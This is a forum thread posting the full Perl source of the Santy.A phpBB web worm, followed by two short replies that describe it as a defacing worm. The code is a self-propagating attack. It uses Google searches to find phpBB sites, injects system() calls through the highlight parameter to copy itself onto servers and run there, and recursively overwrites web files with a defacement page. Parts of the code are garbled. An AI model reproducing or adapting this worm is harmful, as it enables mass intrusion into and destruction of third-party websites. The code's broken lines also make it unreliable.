santy.a source code

wolvrine · 17-09-2005, 10:55 PM

This is the source of the PhpBB Worm Santy.A

Code:

# 
# Santy.A - phpBB <= 2.0.10 Web Worm Source Code (Proof of Concept) 
#                          ~~ For educational purpose ~~ 
# 
# See : http://isc.sans.org/diary.php?date=2004-12-21 
#          http://www.k-otik.com/news/20041221.phpbbworm.php 
#          http://www.f-secure.com/v-descs/santy_a.shtml 
# 
#!/usr/bin/perl 
use 
strict; 
use Socket; 


sub PayLoad(); 
sub DoDir($); 
sub DoFile ($); 
sub GoGoogle(); 

sub GrabURL($); 
sub str2chr($); 

eval{ fork and exit; }; 

my $generation = x; 
PayLoad() if $generation > 3; 

open IN, $0 or exit; 
my $self = join '', <IN>; 
close IN; 
unlink $0; 

while(!GrabURL('http://www.google.com/advanced_search')) { 
if($generation > 3) 
{ 
PayLoad() ; 
} else { 
exit; 
} 
} 

$self =~ s/my \$generation = (\d+);/'my $generation = ' . ($1 + 1) . ';'/e; 

my $selfFileName = 'm1ho2of'; 
my $markStr = 'HYv9po4z3jjHWanN'; 
my $perlOpen = 'perl -e "open OUT,q(>' . $selfFileName . ') and print q(' . $markStr . ')"'; 
my $tryCode = '&highlight=%2527%252Esystem(' . str2chr($perlOpen) . ')%252e%2527'; 

while(1) { 
exit if -e 'stop.it'; 

OUTER: for my $url (GoGoogle()) { 

exit if -e 'stop.it'; 

$url =~ s/&highlight=.*$//; 
$url .= $tryCode; 
my $r = GrabURL($url); 
next unless defined $r; 
next unless $r =~ /$markStr/; 

while($self =~ /(.{1,20})/gs) { 
my $portion = '&highlight=%2527%252Efwrite(fopen(' . str2chr($selfFileName) . ',' . str2chr('a') . '), 
' . str2chr($1) . '),exit%252e%2527'; 

$url =~ s/&highlight=.*$//; 
$url .= $portion; 

next OUTER unless GrabURL($url); 
} 

my $syst = '&highlight=%2527%252Esystem(' . str2chr('perl ' . $selfFileName) . ')%252e%2527'; 
$url =~ s/&highlight=.*$//; 
$url .= $syst; 

GrabURL($url); 
} 
} 



sub str2chr($) { 
my $s = shift; 

$s =~ s/(.)/'chr(' . or d($1) . ')%252e'/seg; 
$s =~ s/%252e$//; 

return $s; 
} 


sub GoGoogle() { 
my @urls; 
my @ts = qw/t p topic/; 
my $startURL = 'http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all' . '& 
q=allinurl%3A+%22viewtopic.php%22+%22' . $ts[int(rand(@ts))] . '%3D' . int(rand(30000)) . 
'%22&btnG=Search'; 
my $goo1st = GrabURL($startURL) 
fined $goo1st; 
my $allGoo = $goo1st; 
my $r = '<td><a href=(/search\?q=.+?)' . '><img src=/nav_page\.gif width=16 height=26 
alt="" border=0>
\d+</a>'; 
while($goo1st =~ m#$r#g) { 
$allGoo . = GrabURL('www.google.com' . $1); 
} 
while($allGoo =~ m#href=(http://\S+viewtopic.php\S+)#g) { 
my $u = $1; 
next if $u =~ m#http://.*http://#i; # no redirects 
push(@urls, $u); 
} 

return @urls; 
} 


sub GrabURL($) { 
my $url = shift; 
$url =~ s#^http://##i; 

my ($host, $res) = $url =~ m#^(.+?)(/.*)#; 
return unless defined($host) && defined($res); 

my $r = 
"GET $resHTTP/1.0\015\012" . 
"Host: $host\015\012" . 
"Accept:*/*\015\012" . 
"Accept-Language: en-us,en-gb;q=0.7,en;q=0.3\015\012" . 
"Pragma: no-cache\015\012" . 
"Cache-Control: no-cache\015\012" . 
"Referer: http://" . $host . $res . "\015\012" . 

"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\015\012" . 
"Connection: close\015\012\015\012"; 

my $port = 80; 
if($host =~ /(.*):(\d+)$/){ $host = $1; $port = $2;} 

my $internet_addr = inet_aton($host) or return; 
socket(Server, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or return; 
setsockopt(Server, SOL_SOCKET, SO_RCVTIMEO, 10000); 

connect(Server, sockaddr_in($port, $internet_addr)) or return; 
select((select(Server), $| = 1)[0]); 
print Server $r; 

my $answer = join '', <Server>; 
close (Server); 

return $answer; 
} 


sub DoFile($) { 
my $s = q{ 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> 
<HTML><HEAD><TITLE>This site is defaced!!!</TITLE></HEAD> 
<BODY bgcolor="#000000" text="#FF0000"> 
<H1>This site is defaced!!!</H1> 
<HR><ADDRESS>NeverEverNoSanity WebWorm generation } 
. $generation .q{.</ADDRESS> 
</BODY></HTML> 
}; 

unlink $_[0]; 
open OUT, ">$_[0]" or return; 
print OUT $s; 
close OUT; 
} 


sub DoDir($) { 

my $dir = $_[0]; 
$dir .= '/' unless $dir =~ m#/$#; 

local *DIR; 
opendir DIR, $dir or return; 

for my $ent (grep { $_ ne '.' and $_ ne '..' } readdir DIR) { 

unless(-l $dir . $ent) { 
if(-d _) { 
DoDir($dir . $ent); 
next; 
} 
} 

if($ent =~ /\.htm/i or $ent =~ /\.php/i or $ent =~ /\.asp/i or $ent =~ /\.shtm/i or $ent =~ /\.jsp/i 
or $ent =~ /\.phtm/i) { 
DoFile($dir . $ent); 
} 
} 

closedir DIR; 
} 


sub Pay Load() { 

my @dirs; 


eval{ 
while(my @a = getpwent()) { push(@dirs, $a[7]);} 
}; 

push(@dirs, '/ '); 

for my $l ('A' .. 'Z') { 
push(@d 
for my $d (@dirs) { 
DoDir($d); 
} 
}

nice

tuxfan · 17-09-2005, 11:39 PM

What does this worm actually do?

QwertyManiac · 18-09-2005, 08:56 PM

Its a PERL Worm,

It exploits vulners in PhpBB and Defaces the sites usin it...

Read More
http://www.sophos.com/virusinfo/anal...erlsantya.html

Pretty Dangerous if u ask me, but with the recent PhP release, tis protected :d

17-09-2005, 11:39 PM	#2 (permalink)
tuxfan Human Spambot Join Date: Feb 2004 Location: Mumbai Posts: 2,653	What does this worm actually do? __________________ :: Free hosting and free domain names available in special cases. Conditions apply ::

18-09-2005, 08:56 PM	#3 (permalink)
QwertyManiac Commander in Chief Join Date: Jul 2005 Posts: 6,657	Its a PERL Worm, It exploits vulners in PhpBB and Defaces the sites usin it... Read More http://www.sophos.com/virusinfo/anal...erlsantya.html Pretty Dangerous if u ask me, but with the recent PhP release, tis protected :d __________________ Harsh J www.harshj.com

Thread Tools
Show Printable Version Email this Page
Display Modes
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode

Popular Categories

Popular Articles

Content Categories

Sister Sites

Follow Us

Facebook Channels

Digit Magazine

	Advertisements. Register and be a member of the community to get rid of them.
Advertisement